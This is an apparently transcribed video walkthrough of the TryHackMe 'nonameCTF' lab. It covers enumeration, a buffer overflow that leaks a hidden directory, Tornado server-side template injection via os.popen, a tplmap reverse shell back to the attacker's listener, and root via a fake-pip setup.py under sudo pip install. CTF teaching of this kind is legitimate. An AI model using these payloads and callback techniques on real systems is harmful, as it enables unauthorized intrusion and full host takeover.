Hello everybody, my name is Optional and today we are going to be taking a look at nonameCTF on Tryhackme. It's a fun little box. As we can see by the description here, we have buffer overflow, server-side template injection and more. This room was created by Stuxnet and is probably one of my favourite rooms on the server at the moment, or on the platform at the moment. So to get started, I have actually removed the username and root text from my browser just so it's redacted. I'm going to get started by clicking deploy, which we've already done, and we get our IP address. So the first thing you want to do when you get onto any box is run NMAP. So the first thing we're going to be doing is checking for any open ports and what those ports might be. So to start off, we're going to do nmap tac sc for standard scripts or safe scripts, I believe, and then SV for system versions, and then we can drop the IP, or output normal, and then scans, and then we do nmap. I have already ran this scan, and then you're going to drop your IP address there. However, a good practice to get into is to start having tac which is going to check for every port, not just the first 1024. I'm not going to run this now because we have already ran that, so we're going to go into scans and nmap, and we're going to see what we got. So to start off with, we can see we have a few ports open. So we have port 22, port 80, port 2222, and port 9090. So if we look at port 80 to begin with, let's just drop that in here. We get check me, exclamation point. So it's not really much here. We could go along and start, let's just go into, Tryhackme and no name. We're then going to run Gobuster, which is just going to be for directory brute forcing. So we do Gobuster dir, which selects directory mode, and our URL, tac u, which is to specify where we are attacking. Tac w for word list, and we're going to use a share word list dirbuster and directory to free medium. You can also, it's good standard practice to get into, is to do tac o, which is for output. Then you can do scans and Gobuster. This is going to run through. We're not going to look too much in this, but while this is going, we can go back to our results. So we also have port 9090. So let's just check that on the browser and see what we have here. So we have nothing special. So we find out a couple of pieces of information from this actually. We find that this is tornado.web. Tornado, for those of you that do not know, and we will Google this, we'll take a note of this actually. We will just drop this in a cherry tree document. So we'll do port 9090 error. So that just shows us what we got there. We won't go too much into this at the moment. However, we will go back to this, and it says check me, so we will do Control U, which tells us char buffer 250, A times 1000. So this is basically telling us our character buffer in a program, and it's also telling us A times 1000 should get that. So we're going to pull that as well, and we're going to go port 80 hidden in code source. So it's just a good idea to keep track of what you've got, where you've got it from. Have we got any results on Gobuster? No, I don't think we do actually get any results on Gobuster, or we won't get any results. However, we will go back to what ports we have open again. So one thing it's quite common to do is if you find web servers, go over your web servers, do your directory, brute forcing with Gobuster dirb, dirbuster wfuzz, whatever program you feel comfortable using. However, always don't just leave it at that. Like, a lot of people will just leave it at that and go get a coffee, go get whatever, go get something to eat. However, there are other ports open, so we have 2222. We're not going to look at OpenSSH, mainly because that would require us to use credentials, and we currently do not have, 1, a username, or 2, a password. So we're actually going to have a look at 2222. Let's see what we get. So you go on here, welcome to nonameCTF, choose your action, register, login, get secret directory and store your buffer. Wrong option, goodbye. So my guess is here is we actually have to connect to it. So we're going to open up a new screen. I'm going to navigate back to Tryhackme and noname just because I should already be in here, but clearly didn't do my TMUX session correctly. But we are going to tunnel into that with NC for netcat, our IP address and the target port. And suddenly we have interaction. So if we try free for get secret directory, please log in first. We don't have any credentials, but we do have a register. So let's do that. Add our username, which is going to be optional, and our password, which is going to be optional. Now we will see if we can log in, and we can. You are now authenticated. But if we do get secret directory, my secret is in port 1990 is. We don't actually get anything, which leaves us with store your buffer. So let's see what that does. Let's just scream at it a little bit with a couple of A's, and then see if that does anything. So it does store it, and it stores it here. So this is instantly a point that we can potentially overflow. Going back to the Tryhackme page, it does actually say buffer overflows, and with the knowledge that we've got from our hidden encode source, character buffer 250 and our A's times 1000. So what we can do is there is a handy little, is it create? No, it is like MSF create. Oh wait, it's pattern create. How am I messing this up? Oh, there it is. Pattern create. So we can use this to generate a string. So instead of actually having to repetitively hold down our keyboard for a number of seconds, we can do this. So if we do TAC-H, it tells us how we do it. So we will be using /L, and we will set length 1000. Now I don't have high hopes that this is going to return anything. However, if all need be in, we can just copy it in. So we'll do buffer once and get secret directory, and we don't actually get a hit saying it. So there's no overflow on 1000 characters. But let's try that again, and we'll copy it twice and do it. And boom, my secret in the port 1990 is / this directory. So it doesn't matter what we are running on here, we are not going to get anything. So let's just close this out. We have everything that we need from there. And let's close this as well. Port 2222, overflow, option 4, and use option 3, A times 2000. Now there is a chance that if we did do A times 1000 with Python, for example, just to return 1000 A's, that might have actually worked. However, for this, we don't. So we get told that on port 9000 / this, we actually have cybersecurity training made easy. Hello blank. Tryhackme takes the pain out of learning cybersecurity, and for those of you that don't know, this I believe is just a splash page for Tryhackme when you first visit the website. So there's a few things we can do. We can check the page source, for example. We don't find anything here. We can also, while we're doing this, we'll set up a Gobuster for this just in case, because we might be missing something, and it's always a good habit to get into. Media, directory list 2 free medium. So we'll just run that. We'll see if we get any hits. We may not. Who knows? I'm also thinking we've never checked the source on here, which isn't anything, so that's fine. So while we're here, let's see if there is anything in here. So we get cybersecurity training made easy. There's nothing really going on until, let's see if there's anything else hidden in here. So we find a comment, and this comment says $hackme, which is a variable. Now my guess being here, I'm going to stop that. if we put Tryhackme here, it does an error. So can we check for here? So this is actually a prime example of server-side template injection. So anything we put here is going to be reflected in the site. And for those of you that aren't familiar with server-side template injection, the normal I'll open it up in Cherry Tree. Actually, I can do it here. So on a web page, you would have there's a few different things that you look for with server-side template injection. So within the form, you shouldn't really give unsanitized or unrestricted access to variables in server-side in this sort of development. You will find that with this, people can find injection points similar to how you can use SQL injection if it's unsanitized, and you can do malicious actions through that. So there's two things we can do. The basic syntax for it will be something like, just basic testing will be 5 times 5, and we will see what that returns. So if we do this, it's key to put in the curly braces, 5 times 5, we get 25, which actually confirms that this is injectable. So if we do payloads of all things, this isn't actually necessary, but I will show you guys this nifty little GitHub repository for those of you that may not be aware of it. It has all sorts of payloads running from cross-site request forgery, GraphQL injection, XSS, all sorts. But the one we're looking for is server-side template injection. So for those of you that don't know, there are different ones. There is Ruby, Java, Twig, Smarty, FreeMaker, Pebble, or FreeMarker, Pebble. The one I believe we are on is Ginger. So if we, for example, do this, so we just modify it slightly. For this, just to show that it is, we're going to do the exact same that they had on there, 7, and it returns exactly what we'd expect. So this confirms that we are on a Ginger 2 backend. I'm not going to focus too much on here, because when you find SSTI, you can usually do stuff like this, which is actually how we will gain our RCE. So we'll do import OS, and then here we will do our usual braces. So we will do os.poppen, the open brackets, and whatever we put in here, we will have a bit of fun with. So if, for example, we want to do who am I? Actually, we'll start off with something like ls, and then we add .read. So this is actually jumping ahead. So we will go. We know it's a tornado backend, and if we Google tornado SSTI, we get a couple of interesting blog posts that actually talk this one. Not this one. This is the one we're looking for. So this goes over. This is how it would form in the code. Hello name. Server.py is formatted like this, and it will generate like this. So what you can find and actually do when we get down here is name equals 4, and then we can do import os poppen whoami.read. So we're going to add the .read, which we have, and if we do that, we get an error because I have forgot to put open and close brackets. Server.py. So one of the key things that I will highlight here is if you do actually view source, you get this, right? And you get it here. So this is by default when you send a request through the actual web browser, it's going to URL encode everything. However, if you view source and do lsla, it will URL encode it to send the request to the server, but it will actually show it in plain text, so you can actually use this and it will give you a nice little. Whereas if we view it in without view source, we're going to see it's all clumped together and horrible. But you know, for this, so we actually know we are here. So where are we? First off, we are in home Zeldris noname SSTI. So there is actually a nice little tool that we can use, and if we wanted to, we will do workcatch ls/la/home/ what's this user's name? Zeldris, and we'll just drop that there, and we can see a few things. We've got bash history. We also have user.txt. So we're not going to put the user.txt flag on screen. However, we will do word count, tag L, and it will. Oh, why did I mess up? WC. There we go. So it will tell us it's 39 characters long, which does match the flag. And if you wanted to just go through the RCE route, you can just use cat and it will return it. However, we're not going to be doing that today. However, I will show you guys a nifty little tool, which is what I use to actually gain shell, and I know a lot of people have also used it to gain shell. So we're going to take a little trip into TPLMap. So for those of you that don't know, obviously there is SQLMap, which, as you'd expect, is designed to map out and enumerate SQL sites. TPLMap does that exactly the same as it would an SQL one. However, this one is orientated around server-side template injection. So all you've got to do to get this set up is do a git clone on this repository. You do your pip tac install tac r requirements, and that's just going to get everything sorted. You may not even need the requirements because a lot of them are just basic models. And let's just try this. So if we do python tplmap tac h, it's going to give us a bunch of commands on how we use it. So to get started, we know it's option, we know we're going to need a URL, so if we do tplmap tac u and then import, that is not the import, that's the GitHub. However, let's just grab this from here, tac u, and then we want a reverse shell, which is right here, run a system shell and back connect to localhost. So if we do reverse shell equals, do I have to do reverse shell equals? See what that requests. Requires two arguments. So first we're going to do if config ton 0, and we're also, because it seems to be looking for first shell localhost import. Okay, so we're going to do netcat lvmp, which is listen verbose, and I can never remember what that does, and p, which is specify import, and we're going to do 9001. So we've now set up a TCP listener on port 9001. So we're going to do reverse shell equals, and we're going to do, do I need the equals? No, I don't. So we'll do 10.86248, and we will do 9001. We will execute that, and we will go from there. So it has confirmed that it's unreliable rendering of start, and we get a callback. So there we go. That gives us a shell on the box, and I can now close that out, and we are in. So let's just confirm who am I, PWK and ID. So we have all of this. Perfect. So to start off with, we're going to just do our usual, which is import pty, or python tac c import pty, pty.spawn, open and bin bash, and close that. So that's just going to give us an interactive Python shell. For those of you that aren't too familiar with how to get started or what you're doing with once you've got your foothold, how to get a fully established shell, one command to remember is always python tac c import pty, pty.spawn, because that's just creating a bin bash environment for us. We can then do export term equals xterm, which will give us stuff like clear. However, we don't have tab autocomplete yet, so let's just do control Z, stty tac, no, raw tac minus echo. Then if you do fg, boom. Now if I do cat server and then tab, we have our tab autocomplete. So this is just a really nice way of getting used to how you may enumerate a system, or not enumerate, how you may gain your stable shell. So if I control C, it's not going to close us out anymore, unless you type, even exit doesn't get rid of it. So if you're in Tmux, you just control whatever your key is and then X, or you can close terminal session. So what we're going to do is we're just going to confirm workout such u, workout user, and we get that. So it's also readable by us, as we can see here. So now we're on the server. We can obviously have any sudo, or we do have sudo even. So first thing I always do is sudo tac l, which is just going to list what we can run. So we can see root, no password, pip install asterisk. So this is actually an interesting vulnerability. So if we do pip install asterisk exploit, we'll see if we get anything come up. We get pip install exploit. So I know I've already done this and it obviously come up as a purple mark. But this was the first thing I clicked on when I found this. So we can run install and then dot upgrade force install, right? As we can see here, demonstration root password install asterisk. This is actually, I'm pretty sure this is matching the exact thing except for you got all. So what we need to do is we need to download setup.py. Does this have git installed? I never checked. No. Okay, that's fine. So we've got setup.py, and then we just pull that to the remote one, and then get it to connect back to us, right? So if we just do GitHub and we open up another terminal, git clone, and we'll just pull that over. Shouldn't take too long, and there we go. So fake pip, and we want to change our setup.py so that it includes our details. So instead of localhost, we want to change this to, I had this up just a second ago, so I should remember it. However, my memory is like a sieve. Turn 0, we're going to just change this to 10.86. Ooh, hello. What did I just modify? Let's just try that again. So we're going to change localhost so that it has 10.8.6248, and just for the simplicity, and I don't like having this port, we will change it to 1.2.3.4. So that's that done. And then all we need to do is Python TACM, which is Python and make, and we're just going to set up a simple HTTP server. Do we have wget on this? We do. So let's just wget that from our box, which is 248:8000 for our port, and we are pulling setup.py. Bingo. So next thing we've got to do is we want to set up our netcat listener again. So we do netcat lvmp 1234. We'll also close this just so it's a little bit cleaner. And what was the next step we had? It was just run move cd, and then it was just run this command. So if we pull this command right here, copy, and bingo. I should have actually done this process in home, and it spotted our fake pip. So it's ran, and we can see we have root at Ubuntu come from our callback. Who am I? Root ID 000, and pwd is some reason in the temp pip. So that's fine. So we're just going to go into our root directory, and we can see that's coming up there for some reason. Okay. So we see root.txt, so we can obviously cat that. However, we're just going to word count it, and it comes up with 31, which matches. So that's a cool little box. I enjoy it just because of the server-side template injection. It's one of my favorite vulnerabilities. I definitely learned something on the pip exploit because it's not something you commonly see. However, though it was a relatively straightforward box, I do urge anyone to go give it a try. It is a great box, and good job to stuxnet for creating it. That's going to be all for this video, guys. I hope you learned something. If you need anything, feel free to message me anytime on the Discord server, and catch you guys later.